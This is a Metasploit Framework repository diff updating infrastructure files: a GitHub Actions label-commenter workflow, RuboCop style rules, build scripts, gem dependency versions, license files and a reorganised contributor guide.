automatic module_metadata_base.json update

Land #13143 , fix broken redis_unauth_exec check in msfconsole
Land #13144 , update to faraday 1.0.0
2020-03-26 07:31:06 -05:00 · 2020-03-26 12:21:26 +00:00 · 2020-03-26 12:12:36 +00:00 · 2020-03-26 10:36:13 +00:00 · 2020-03-25 16:25:50 -05:00 · 2020-03-25 16:16:04 -05:00
904 changed files with 29919 additions and 8023 deletions
@@ -0,0 +1,15 @@
+labels:
+  - name: needs-docs
+    labeled:
+      pr:
+        body: |
+          Thanks for your pull request, before this can be merged - corresponding documentation for your module is required:
+          - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+          - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
+          - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
+        action: open
+    unlabeled:
+      issue:
+        body: |
+          Thank you for adding module documentation :tada:
+        action: open
@@ -0,0 +1,29 @@
+#
+# Automatically respond to any issues/pull requests that have the given labels assigned.
+#
+name: Label Commenter
+
+on:
+  issues:
+    types:
+      - labeled
+      - unlabeled
+  pull_request:
+    types:
+      - labeled
+      - unlabeled
+
+jobs:
+  comment:
+    runs-on: ubuntu-18.04
+    steps:
+      - uses: actions/checkout@v2
+        with:
+          ref: master
+
+      - name: Label Commenter
+        # Note: Using SHA explicitly for v1.2.3 - https://julienrenaux.fr/2019/12/20/github-actions-security-risk/
+        uses: peaceiris/actions-label-commenter@93941f8f189a4b92ab75059aa39fe421469253f4
+        with:
+          github_token: ${{ secrets.GITHUB_TOKEN }}
+          config_file: .github/label-commenter-config.yml
@@ -2,6 +2,7 @@ acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
 acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
 acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
 adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
+adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
 bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
 bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
@@ -25,6 +26,7 @@ pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
 sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
 shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
+smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
 space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
 tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
 todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
@@ -11,6 +11,16 @@
 AllCops:
  TargetRubyVersion: 2.4

+require:
+  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
+  - ./lib/rubocop/cop/layout/module_description_indentation.rb
+
+Layout/ModuleHashOnNewLine:
+  Enabled: true
+
+Layout/ModuleDescriptionIndentation:
+  Enabled: true
+
 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
  Enabled: true
@@ -59,6 +69,25 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

+Layout/FirstArgumentIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/ArgumentAlignment:
+  Enabled: true
+  EnforcedStyle: with_first_argument
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful for the module hash to be indented consistently'
+
+Layout/FirstHashElementLineBreak:
+  Enabled: true
+  Description: 'Enforce consistency by breaking hash elements on to new lines'
+
 Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
  Description: 'Almost all module metadata have space in brackets'
@@ -93,26 +122,26 @@ Style/TrailingCommaInArrayLiteral:

 Metrics/LineLength:
  Description: >-
-                  Metasploit modules often pattern match against very
-                  long strings when identifying targets.
+    Metasploit modules often pattern match against very
+    long strings when identifying targets.
  Enabled: true
  Max: 180

 Metrics/BlockLength:
  Enabled: true
  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
  Max: 300

 Metrics/MethodLength:
  Enabled: true
  Description: >-
-                  While the style guide suggests 10 lines, exploit definitions
-                  often exceed 200 lines.
+    While the style guide suggests 10 lines, exploit definitions
+    often exceed 200 lines.
  Max: 300

-Naming/UncommunicativeMethodParamName:
+Naming/MethodParameterName:
  Enabled: true
  Description: 'Whoever made this requirement never looked at crypto methods, IV'
  MinNameLength: 2
@@ -126,13 +155,10 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

-Layout/AlignHash:
-  Enabled: false
-  Description: 'aligning info hashes to match these rules is almost impossible to get right'
-
-Layout/EmptyLines:
-  Enabled: false
-  Description: 'these are used to increase readability'
+Layout/FirstArrayElementIndentation:
+  Enabled: true
+  EnforcedStyle: consistent
+  Description: 'Useful to force values within the register_options array to have sane indentation'

 Layout/EmptyLinesAroundClassBody:
  Enabled: false
@@ -142,19 +168,24 @@ Layout/EmptyLinesAroundMethodBody:
  Enabled: false
  Description: 'these are used to increase readability'

-Layout/AlignParameters:
+Layout/ExtraSpacing:
+  Description: 'Do not use unnecessary spacing.'
  Enabled: true
-  EnforcedStyle: 'with_fixed_indentation'
-  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'
+  # When true, allows most uses of extra spacing if the intent is to align
+  # things with the previous or next line, not counting empty lines or comment
+  # lines.
+  AllowForAlignment: false
+  # When true, allows things like 'obj.meth(arg)  # comment',
+  # rather than insisting on 'obj.meth(arg) # comment'.
+  # If done for alignment, either this OR AllowForAlignment will allow it.
+  AllowBeforeTrailingComments: false
+  # When true, forces the alignment of `=` in assignments on consecutive lines.
+  ForceEqualSignAlignment: false

 Style/For:
  Enabled: false
  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'

-Style/StringLiterals:
-  Enabled: false
-  Description: 'Single vs double quote fights are largely unproductive.'
-
 Style/WordArray:
  Enabled: false
  Description: 'Metasploit prefers consistent use of []'
@@ -163,6 +194,22 @@ Style/IfUnlessModifier:
  Enabled: false
  Description: 'This style might save a couple of lines, but often makes code less clear'

+Style/PercentLiteralDelimiters:
+  Description: 'Use `%`-literal delimiters consistently.'
+  Enabled: true
+  # Specify the default preferred delimiter for all types with the 'default' key
+  # Override individual delimiters (even with default specified) by specifying
+  # an individual key
+  PreferredDelimiters:
+    default: ()
+    '%i': '[]'
+    '%I': '[]'
+    '%r': '{}'
+    '%w': '[]'
+    '%W': '[]'
+    '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
+  VersionChanged: '0.48.1'
+
 Style/RedundantBegin:
  Exclude:
    # this pattern is very common and somewhat unavoidable
@@ -43,7 +43,7 @@ before_install:
  - ls -la ./.git/hooks
  - ./.git/hooks/post-merge
  # Update the bundler
-  - gem update --system
+  - gem update --system 3.0.6
  - gem install bundler
 before_script:
  - cp config/database.yml.travis config/database.yml
@@ -1,64 +1,66 @@
-# Hello, World!
-
-Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are multiple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
-
 # Contributing to Metasploit
+Thank you for your interest in making Metasploit -- and therefore, the
+world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
+
+## Code Free Contributions 
+Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
+ 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
+ - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
+ - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
+ - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 

-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!

 ## Code Contributions
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.

-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
+
+Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
+will be closed. We need to ensure the code we're adding to master is written to a high standard.
+
+
+### Code Contribution Do's & Don'ts:
+--
+#### <u>Pull Requests</u>
+**Pull request [PR#9966] is a good example to follow.**
+
+* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
+	*  Protect the process.
+	* Ensures users are aware of commits on the branch being considered for merge.  
+	* Allows for a location for more commits to be offered without mingling with other contributor changes.
+	* Allows contributors to make progress while a PR is still being reviewed.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
-  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
-  allows for a location for more commits to be offered without mingling with other contributor changes,
-  and allows contributors to make progress while a PR is still being reviewed.
-
-
-### Pull Requests
-
 * **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.

-Pull request [PR#9966] is a good example to follow.
-
-#### New Modules
-
+#### <u>New Modules</u>
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
 * **Do** use the many module mixin [API]s.
-* **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
 * **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
-
-#### Library Code
+* **Don't** include more than one module per pull request.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.

+#### <u>Library Code</u>
 * **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

-#### Bug Fixes
-
+#### <u>Bug Fixes</u>
 * **Do** include reproduction steps in the form of verification steps.
 * **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.

@@ -99,8 +101,8 @@ curve, so keep it up!
 [Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://betterspecs.org
+[Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -27,9 +27,9 @@ RUN apk add --no-cache \
      zlib-dev \
      ncurses-dev \
      git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
@@ -8,7 +8,7 @@ gem 'sqlite3', '~>1.3.0'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
-  gem 'simplecov'
+  gem 'simplecov', '0.18.2'
 end

 group :development do
@@ -17,9 +17,13 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry'
+  gem 'pry-byebug'
  # module documentation
  gem 'octokit'
+  # memory profiling
+  gem 'memory_profiler'
+  # cpu profiling
+  gem 'ruby-prof'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
  #gem 'metasploit-aggregator'
@@ -36,6 +40,7 @@ group :development, :test do
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
+  gem 'rubocop'
  gem 'swagger-blocks'
 end

@@ -1,14 +1,13 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.63)
+    metasploit-framework (5.0.82)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      aws-sdk-ec2
      aws-sdk-iam
      aws-sdk-s3
-      backports
      bcrypt (= 3.1.12)
      bcrypt_pbkdf
      bit-struct
@@ -16,18 +15,21 @@ PATH
      dnsruby
      ed25519
      em-http-request
+      eventmachine
      faker
-      faraday (<= 0.17.0)
+      faraday
+      faye-websocket
      filesize
+      hrr_rb_ssh (= 0.3.0.pre2)
      jsobfu
      json
      metasm
-      metasploit-concern
-      metasploit-credential
-      metasploit-model
-      metasploit-payloads (= 1.3.79)
-      metasploit_data_models (= 3.0.10)
-      metasploit_payloads-mettle (= 0.5.16)
+      metasploit-concern (~> 2.0.0)
+      metasploit-credential (~> 3.0.0)
+      metasploit-model (~> 2.0.4)
+      metasploit-payloads (= 1.3.86)
+      metasploit_data_models (~> 3.0.10)
+      metasploit_payloads-mettle (= 0.5.20)
      mqtt
      msgpack
      nessus_rest
@@ -113,40 +115,41 @@ GEM
      public_suffix (>= 2.0.2, < 5.0)
    afm (0.2.2)
    arel (6.0.4)
-    arel-helpers (2.10.0)
+    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
+    ast (2.4.0)
    aws-eventstream (1.0.3)
-    aws-partitions (1.246.0)
-    aws-sdk-core (3.82.0)
+    aws-partitions (1.287.0)
+    aws-sdk-core (3.92.0)
      aws-eventstream (~> 1.0, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.121.0)
+    aws-sdk-ec2 (1.151.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.32.0)
+    aws-sdk-iam (1.34.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.26.0)
+    aws-sdk-kms (1.30.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.57.0)
-      aws-sdk-core (~> 3, >= 3.77.0)
+    aws-sdk-s3 (1.61.1)
+      aws-sdk-core (~> 3, >= 3.83.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.1.0)
+    aws-sigv4 (1.1.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
-    backports (3.15.0)
    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.1)
-    bindata (2.4.4)
+    bindata (2.4.6)
    bit-struct (0.16)
-    builder (3.2.3)
+    builder (3.2.4)
+    byebug (11.1.1)
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
    cookiejar (0.3.3)
-    crass (1.0.5)
+    crass (1.0.6)
    daemons (1.3.1)
    diff-lcs (1.3)
    dnsruby (1.61.3)
@@ -170,27 +173,34 @@ GEM
      railties (>= 4.2.0)
    faker (2.2.1)
      i18n (>= 0.8)
-    faraday (0.17.0)
+    faraday (1.0.0)
      multipart-post (>= 1.2, < 3)
+    faye-websocket (0.10.9)
+      eventmachine (>= 0.12.0)
+      websocket-driver (>= 0.5.1)
    filesize (0.2.0)
    fivemat (1.3.7)
    hashery (2.1.2)
+    hrr_rb_ssh (0.3.0.pre2)
+      ed25519 (~> 1.2)
    http_parser.rb (0.6.0)
    i18n (0.9.5)
      concurrent-ruby (~> 1.0)
+    jaro_winkler (1.5.4)
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.2.0)
+    json (2.3.0)
    loofah (2.4.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
+    memory_profiler (0.9.14)
    metasm (1.0.4)
    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (3.0.3)
+    metasploit-credential (3.0.4)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
@@ -204,7 +214,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.79)
+    metasploit-payloads (1.3.86)
    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -215,25 +225,29 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.16)
+    metasploit_payloads-mettle (0.5.20)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
-    minitest (5.13.0)
+    minitest (5.14.0)
    mqtt (0.5.0)
-    msgpack (1.3.1)
+    msgpack (1.3.3)
    multipart-post (2.1.1)
    nessus_rest (0.1.6)
    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.5)
+    nokogiri (1.10.9)
      mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.18.0)
+      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
+    parallel (1.19.1)
+    parser (2.7.0.4)
+      ast (~> 2.4.0)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
    pdf-reader (2.4.0)
@@ -251,8 +265,11 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (4.0.1)
-    rack (1.6.11)
+    pry-byebug (3.8.0)
+      byebug (~> 11.0)
+      pry (~> 0.10)
+    public_suffix (4.0.3)
+    rack (1.6.13)
    rack-protection (1.5.5)
      rack
    rack-test (0.6.3)
@@ -270,9 +287,10 @@ GEM
      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
+    rainbow (3.0.0)
    rake (13.0.1)
    rb-readline (0.5.5)
-    recog (2.3.6)
+    recog (2.3.7)
      nokogiri
    redcarpet (3.5.0)
    rex-arch (0.1.13)
@@ -288,7 +306,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.21)
+    rex-exploitation (0.1.22)
      jsobfu
      metasm
      rex-arch
@@ -301,9 +319,10 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.83)
+    rex-powershell (0.1.87)
      rex-random_identifier
      rex-text
+      ruby-rc4
    rex-random_identifier (0.1.4)
      rex-text
    rex-registry (0.1.3)
@@ -311,30 +330,31 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.21)
+    rex-socket (0.1.23)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.2)
-    rex-text (0.2.24)
+    rex-text (0.2.25)
    rex-zip (0.1.3)
      rex-text
+    rexml (3.2.4)
    rkelly-remix (0.0.7)
    rspec (3.9.0)
      rspec-core (~> 3.9.0)
      rspec-expectations (~> 3.9.0)
      rspec-mocks (~> 3.9.0)
-    rspec-core (3.9.0)
-      rspec-support (~> 3.9.0)
-    rspec-expectations (3.9.0)
+    rspec-core (3.9.1)
+      rspec-support (~> 3.9.1)
+    rspec-expectations (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
-    rspec-mocks (3.9.0)
+    rspec-mocks (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.9.0)
-    rspec-rails (3.9.0)
+    rspec-rails (3.9.1)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
@@ -344,23 +364,32 @@ GEM
      rspec-support (~> 3.9.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.9.0)
+    rspec-support (3.9.2)
+    rubocop (0.80.1)
+      jaro_winkler (~> 1.5.1)
+      parallel (~> 1.10)
+      parser (>= 2.7.0.1)
+      rainbow (>= 2.2.2, < 4.0)
+      rexml
+      ruby-progressbar (~> 1.7)
+      unicode-display_width (>= 1.4.0, < 1.7)
    ruby-macho (2.2.0)
+    ruby-prof (1.3.1)
+    ruby-progressbar (1.10.1)
    ruby-rc4 (0.1.5)
    ruby_smb (1.1.0)
      bindata
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (2.0.0)
+    rubyzip (2.3.0)
    sawyer (0.8.2)
      addressable (>= 2.3.5)
      faraday (> 0.8, < 2.0)
-    simplecov (0.17.1)
+    simplecov (0.18.2)
      docile (~> 1.1)
-      json (>= 1.8, < 3)
-      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
+      simplecov-html (~> 0.11)
+    simplecov-html (0.12.2)
    sinatra (1.4.8)
      rack (~> 1.5)
      rack-protection (~> 1.4)
@@ -372,23 +401,27 @@ GEM
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (0.20.3)
+    thor (1.0.1)
    thread_safe (0.3.6)
    tilt (2.0.10)
    timecop (0.9.1)
-    ttfunk (1.5.1)
-    tzinfo (1.2.5)
+    ttfunk (1.6.2.1)
+    tzinfo (1.2.6)
      thread_safe (~> 0.1)
    tzinfo-data (1.2019.3)
      tzinfo (>= 1.0.0)
+    unicode-display_width (1.6.1)
    warden (1.2.7)
      rack (>= 1.0)
+    websocket-driver (0.7.1)
+      websocket-extensions (>= 0.1.0)
+    websocket-extensions (0.1.4)
    windows_error (0.1.2)
    xdr (2.0.0)
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.20)
+    yard (0.9.24)

 PLATFORMS
  ruby
@@ -396,14 +429,17 @@ PLATFORMS
 DEPENDENCIES
  factory_bot_rails
  fivemat
+  memory_profiler
  metasploit-framework!
  octokit
-  pry
+  pry-byebug
  rake
  redcarpet
  rspec-rails
  rspec-rerun
-  simplecov
+  rubocop
+  ruby-prof
+  simplecov (= 0.18.2)
  sqlite3 (~> 1.3.0)
  swagger-blocks
  timecop
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

+Files: lib/expect.rb
+Copyright: 2017 Yukihiro Matsumoto
+License: Ruby
+
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0
@@ -8,26 +8,27 @@ activesupport, 4.2.11.1, MIT
 addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.10.0, MIT
+arel-helpers, 2.11.0, MIT
+ast, 2.4.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.246.0, "Apache 2.0"
-aws-sdk-core, 3.82.0, "Apache 2.0"
-aws-sdk-ec2, 1.121.0, "Apache 2.0"
-aws-sdk-iam, 1.32.0, "Apache 2.0"
-aws-sdk-kms, 1.26.0, "Apache 2.0"
-aws-sdk-s3, 1.57.0, "Apache 2.0"
-aws-sigv4, 1.1.0, "Apache 2.0"
-backports, 3.15.0, MIT
+aws-partitions, 1.285.0, "Apache 2.0"
+aws-sdk-core, 3.91.1, "Apache 2.0"
+aws-sdk-ec2, 1.151.0, "Apache 2.0"
+aws-sdk-iam, 1.34.0, "Apache 2.0"
+aws-sdk-kms, 1.30.0, "Apache 2.0"
+aws-sdk-s3, 1.61.1, "Apache 2.0"
+aws-sigv4, 1.1.1, "Apache 2.0"
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.4, ruby
+bindata, 2.4.6, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
+builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
+byebug, 11.1.1, "Simplified BSD"
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
-crass, 1.0.5, MIT
+crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
@@ -40,39 +41,45 @@ eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 5.1.1, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
-faraday, 0.17.1, MIT
+faraday, 0.17.0, MIT
+faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
+hrr_rb_ssh, 0.3.0.pre2, "Apache 2.0"
 http_parser.rb, 0.6.0, MIT
 i18n, 0.9.5, MIT
+jaro_winkler, 1.5.4, MIT
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.2.0, ruby
+json, 2.3.0, ruby
 loofah, 2.4.0, MIT
+memory_profiler, 0.9.14, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 3.0.3, "New BSD"
-metasploit-framework, 5.0.63, "New BSD"
+metasploit-credential, 3.0.4, "New BSD"
+metasploit-framework, 5.0.82, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.79, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.86, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
-metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 0.5.19, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.13.0, MIT
+minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.1, "Apache 2.0"
+msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
